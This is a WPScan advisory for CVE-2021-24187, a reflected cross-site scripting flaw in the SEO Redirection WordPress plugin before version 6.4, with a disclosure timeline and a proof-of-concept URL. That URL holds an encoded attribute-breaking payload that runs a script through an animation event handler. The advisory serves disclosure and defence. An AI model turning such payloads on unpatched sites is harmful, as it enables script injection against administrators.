WordPress Plugin Vulnerabilities

SEO Redirection < 6.4 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The setting page of the plugin is vulnerable to reflected Cross-Site Scripting (XSS) as user input is not properly sanitised before being output in an attribute.

Timeline (WPScanTeam)
January 29th, 2021 - Report received & Confirmed & Escalated to WordPress plugins Team (who confirmed to have received the report)
March 16th, 2021 - No updates, disclosing
April 18th, 2021 - v6.4 released, fixing the issue

Proof of Concept

https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=on%22style%3D%22animation-name%3Aspinner%22+onanimationstart%3D%22alert%28origin%29%22%3E

Video: https://mega.nz/file/2kkH2ATT#Ip2SOS3ciG2QYVZp6ALyqGksAd6V-85rWPUFOmqUxUE

Affects Plugins

Plugin icon
seo-redirection
Fixed in 6.4

References

CVE
CVE-2021-24187

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
https://research.sun-asterisk.com/
Submitter twitter
vigov5
Verified
Yes
WPVDB ID
c234700e-61dd-46a0-90fb-609e704269a9

Timeline

Publicly Published
2021-03-16 (about 2 years ago)
Added
2021-03-16 (about 2 years ago)
Last Updated
2021-04-27 (about 2 years ago)

Other

Published
Title
Published
2016-02-25
Title
Jetpack <= 3.9.1 - LaTeX HTML Element XSS
Published
2022-04-20
Title
Social Stickers <= 2.2.9 - Stored Cross-Site Scripting via CSRF
Published
2023-01-19
Title
Themify Portfolio Post < 1.2.2 - Contributor+ Stored XSS
Published
2019-03-25
Title
PWA for WP <= 1.0.8 - XSS
Published
2022-07-20
Title
Duplicate Page and Post Plugin < 2.8 - Admin+ Stored Cross-Site Scripting